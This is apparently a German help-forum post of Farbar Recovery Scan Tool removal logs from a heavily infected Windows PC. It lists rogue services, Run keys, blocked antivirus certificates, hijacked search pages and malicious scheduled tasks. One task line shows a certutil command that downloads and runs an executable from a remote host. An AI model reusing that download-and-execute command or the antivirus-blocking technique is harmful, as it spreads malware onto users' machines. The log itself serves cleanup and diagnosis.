848d0b10145f615d9a5315f9c7921103 => Dienst erfolgreich gestoppt.
"HKLM\System\CurrentControlSet\Services\848d0b10145f615d9a5315f9c7921103" => erfolgreich entfernt
848d0b10145f615d9a5315f9c7921103 => Dienst erfolgreich entfernt
C:\Windows\qcusolizqbhuglpw.qcus => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\aspnet_state" => erfolgreich entfernt
aspnet_state => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\EasyAntiCheat" => erfolgreich entfernt
EasyAntiCheat => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\Nettrans" => erfolgreich entfernt
Nettrans => Dienst erfolgreich entfernt
"C:\ProgramData\PrefsSecure" => nicht gefunden
"HKLM\System\CurrentControlSet\Services\pgt_svc" => erfolgreich entfernt
pgt_svc => Dienst erfolgreich entfernt
"C:\Program Files (x86)\ProxyGate" => nicht gefunden
TCPSvc => Dienst konnte nicht gestoppt werden.
"HKLM\System\CurrentControlSet\Services\TCPSvc" => erfolgreich entfernt

Ergebnis der geplanten Datei-Verschiebungen (Start-Modus: Normal) (Datum&Uhrzeit: 31-05-2018 16:12:06)

==> ACHTUNG: Das System wurde nicht neu gestartet.
C:\Windows\windefender.exe => ist erfolgreich verschoben

==== Ende vom Fixlog 16:12:07 ====
         
Addition:

Code:
ATTFilter
Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
durchgeführt von Nico (31-05-2018 14:13:17) Run:1
Gestartet von C:\Users\Nico\Downloads
Geladene Profile: Nico (Verfügbare Profile: Nico)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
CloseProcesses:
HKLM\...\Run: [resolve_run] => C:\Program Files (x86)\Common Files\new.bat [184 2018-05-25] ()
C:\Program Files (x86)\Common Files\new.bat
HKLM\...\Policies\Explorer\Run: [Chrome Update Helper] => C:\Users\Nico\AppData\Local\Temp\dx10r.exe
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ACHTUNG
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ACHTUNG
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ACHTUNG
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ACHTUNG
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ACHTUNG
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ACHTUNG
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ACHTUNG
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ACHTUNG
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ACHTUNG
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ACHTUNG
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ACHTUNG
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [muV82mBJud.exe] => C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69\muV82mBJud.exe [394240 2018-05-27] ()
C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PLRFCKFE44692QO] => "C:\Program Files\RDH9TH3UTU\RDH9TH3UT.exe"
C:\Program Files\RDH9TH3UTU
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [2196509] => "C:\Users\Nico\AppData\Roaming\okdd3kogot1\xc1a5n52rpd.exe" /VERYSILENT
C:\Users\Nico\AppData\Roaming\okdd3kogot1
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [A4UX3F695ZAIC7C] => "C:\Program Files (x86)\eu0vb4pykb5\7CSH7.exe"
C:\Program Files (x86)\eu0vb4pykb5
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [flosdx] => rundll32.exe "C:\Users\Nico\AppData\Local\pfialx.dll",flosdx <==== ACHTUNG
C:\Users\Nico\AppData\Local\pfialx.dll
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [KDY06ILDW1UEHVJ] => "C:\Program Files\I88TDHYW3R\I88TDHYW3.exe"
C:\Program Files\I88TDHYW3R
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PatientSunset] => C:\Windows\rss\csrss.exe [3188736 2018-05-27] () <==== ACHTUNG
C:\Windows\rss\csrss.exe
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [QIJFFKRURZ.exe] => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\QIJFFKRURZ.exe 
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [CloudNet] => C:\Users\Nico\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-05-28] (EpicNet Inc.)
C:\Users\Nico\AppData\Roaming\EpicNet Inc
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\MountPoints2: {21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940} - E:\HiSuiteDownLoader.exe
ShellExecuteHooks: Kein Name - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\System32\mcicda64.dll [2990080 2018-03-24] ()
GroupPolicy: Beschränkung - Chrome <==== ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.de/?gws_rd=ssl
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = 
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> DefaultScope {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
FF HKLM\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}
FF Extension: ( ) - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi [2018-05-27]
FF HKLM-x32\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js [2018-05-27]
R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2018-05-27] () [Datei ist nicht signiert] <==== ACHTUNG
C:\ProgramData\Logic Cramble
R2 MicroService; C:\Users\Nico\AppData\Local\XService\XService.dll [585216 2018-05-27] () [Datei ist nicht signiert]
C:\Users\Nico\AppData\Local\XService
S3 SystemUpdate64; C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [593920 2018-05-27] (SystemaRev) [Datei ist nicht signiert]
C:\Program Files\SystemaRev
R2 winamgr; C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe [10644480 2018-05-28] (Microsoft Corporation) [Datei ist nicht signiert] <==== ACHTUNG
R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
Unlock: C:\Windows\windefender.exe
C:\Windows\windefender.exe
R2 848d0b10145f615d9a5315f9c7921103; rundll32.exe C:\Windows\qcusolizqbhuglpw.qcus QEl [X]
C:\Windows\qcusolizqbhuglpw.qcus
S3 aspnet_state; %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [X]
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [X]
S2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [X] <==== ACHTUNG
C:\ProgramData\PrefsSecure
S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [X] <==== ACHTUNG
C:\Program Files (x86)\ProxyGate
R2 TCPSvc; "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\Nico\AppData\Local\Temp\csrss\proxy\t" <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\csrss
S2 WNetworkMgmt; "C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe"  [X]
C:\ProgramData\Microsoft\Windows\WNetworkMgmt
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ACHTUNG (Null Byte Datei/Ordner)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-27] () [Datei ist nicht signiert]
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\Winmon.sys
2018-05-28 14:53 - 2018-05-28 14:53 - 000003824 _____ C:\Windows\System32\Tasks\MainPMgr
2018-05-28 14:53 - 2018-05-28 14:53 - 000003786 _____ C:\Windows\System32\Tasks\SystemUpdate64
2018-05-28 14:53 - 2018-05-28 14:53 - 000000000 ____D C:\Program Files\SystemaRev
2018-05-28 14:38 - 2018-05-28 14:42 - 000189686 _____ C:\Windows\ntbtlog.txt
2018-05-27 15:09 - 2018-05-27 15:09 - 000000000 ____D C:\ProgramData\SystemaRev
2018-05-27 14:57 - 2018-05-27 14:57 - 000004270 _____ C:\Windows\System32\Tasks\ReimageUpdater
2018-05-27 14:56 - 2018-05-28 14:40 - 000000150 _____ C:\Windows\Reimage.ini
2018-05-27 14:50 - 2018-05-27 14:50 - 000000000 ____D C:\Users\Nico\AppData\Roaming\ParetoLogic
2018-05-27 10:47 - 2018-05-27 11:15 - 000000000 ____D C:\Windows\SysWOW64\SSL
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 001620480 _____ C:\Windows\qcusolizqbhuglpw.qcus
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ C:\Users\Nico\AppData\Local\VoltFinlab.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000015610 _____ C:\Windows\SysWOW64\findit.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000000000 ____D C:\ProgramData\Logic Cramble
2018-05-27 09:58 - 2018-05-27 09:58 - 000000306 __RSH C:\Users\Nico\ntuser.pol
2018-05-27 09:58 - 2018-05-27 09:58 - 000000000 ____D C:\Users\Nico\AppData\Roaming\FastDataX
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\XService
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\Package Cache
2018-05-27 09:49 - 2018-05-27 09:49 - 000000000 ____D C:\Users\Nico\AppData\Roaming\EpicNet Inc
2018-05-27 09:48 - 2018-05-28 14:44 - 000003502 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2018-05-27 09:48 - 2018-05-28 14:44 - 000003172 _____ C:\Windows\System32\Tasks\csrss
2018-05-27 09:48 - 2018-05-27 09:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2018-05-27 09:48 - 2018-05-27 09:48 - 000004180 _____ C:\Windows\System32\Tasks\AncillaryFunctionauf
2018-05-27 09:48 - 2018-05-27 09:48 - 000000000 ____D C:\Users\Nico\AppData\Local\betterworld
2018-05-27 09:48 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
2018-05-27 09:47 - 2018-05-28 16:07 - 000003702 _____ C:\Windows\System32\Tasks\WindowsRecoveryCleaner
2018-05-27 09:47 - 2018-05-28 14:44 - 000000034 _____ C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE}
2018-05-27 09:47 - 2018-05-27 11:41 - 000003082 __RSH C:\ProgramData\ntuser.pol
2018-05-27 09:47 - 2018-05-27 10:22 - 000016718 _____ C:\Windows\System32\Tasks\Social Software
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ C:\Users\Nico\AppData\Local\pfialx.dll
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM
2018-05-27 09:47 - 2018-05-27 09:47 - 000004468 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ
2018-05-27 09:47 - 2018-05-27 09:47 - 000004444 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Program Files\Common Files\5ZNAWZD2EL69
2018-05-27 08:56 - 2018-05-27 08:56 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk
2018-05-27 08:56 - 2018-05-27 08:56 - 000000000 ____D C:\Users\Nico\AppData\LocalLow\AMD
2018-05-26 14:03 - 2018-05-26 14:03 - 001592320 _____ C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe
2018-05-26 14:03 - 2018-05-26 14:03 - 000039584 _____ C:\Windows\uninstaller.dat
2018-05-25 12:23 - 2018-05-25 12:23 - 000000000 ___HD C:\Windows\msdownld.tmp
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-25 01:01 - 2018-05-25 01:01 - 000000184 ____H () C:\Program Files (x86)\Common Files\new.bat
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ () C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ () C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ () C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ () C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ () C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ () C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ () C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ () C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ () C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ () C:\Users\Nico\AppData\Local\pfialx.dll
2018-02-05 20:57 - 2018-05-27 13:14 - 000007654 _____ () C:\Users\Nico\AppData\Local\Resmon.ResmonCfg
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ () C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:47 - 000032038 _____ () C:\Users\Nico\AppData\Local\uninstall_temp.ico
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ () C:\Users\Nico\AppData\Local\VoltFinlab.bin
ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
C:\Windows\system32\mcicda64.dll
Task: {099A856C-08D3-43C8-AD18-3D651763C816} - System32\Tasks\Social Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Social Software\Social Software.dll",UjaAssDjw <==== ACHTUNG
C:\Program Files\Social Software
Task: {1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} - System32\Tasks\SystemUpdate64 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [2018-05-27] (SystemaRev)
C:\Program Files\SystemaRev
Task: {1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_FG => C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d
Task: {28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-27] () <==== ACHTUNG
Task: {412B9FDA-8C4C-40F4-A23C-696805866F9C} - System32\Tasks\AncillaryFunctionauf => C:\Program Files (x86)\nodejs\node.exe
C:\Program Files (x86)\nodejs
Task: {42767FB3-1423-4F1B-8F31-8B5936FA8F06} - System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
Task: {478261E4-F178-4CD8-8575-B8ACE5A0769E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_AM => C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7
Task: {6372E416-89E4-46ED-A9C3-6F1F6F797A15} - System32\Tasks\GoogleUpdateSecurityTaskMachine_NM => C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9
Task: {66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ACHTUNG
Task: {6E7DD5F8-0819-4296-8B92-EEA20358E2F3} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
Task: {AB4D74FB-B89A-4A74-982B-76AE532F4F7F} - System32\Tasks\GoogleUpdateSecurityTaskMachine_OT => C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78
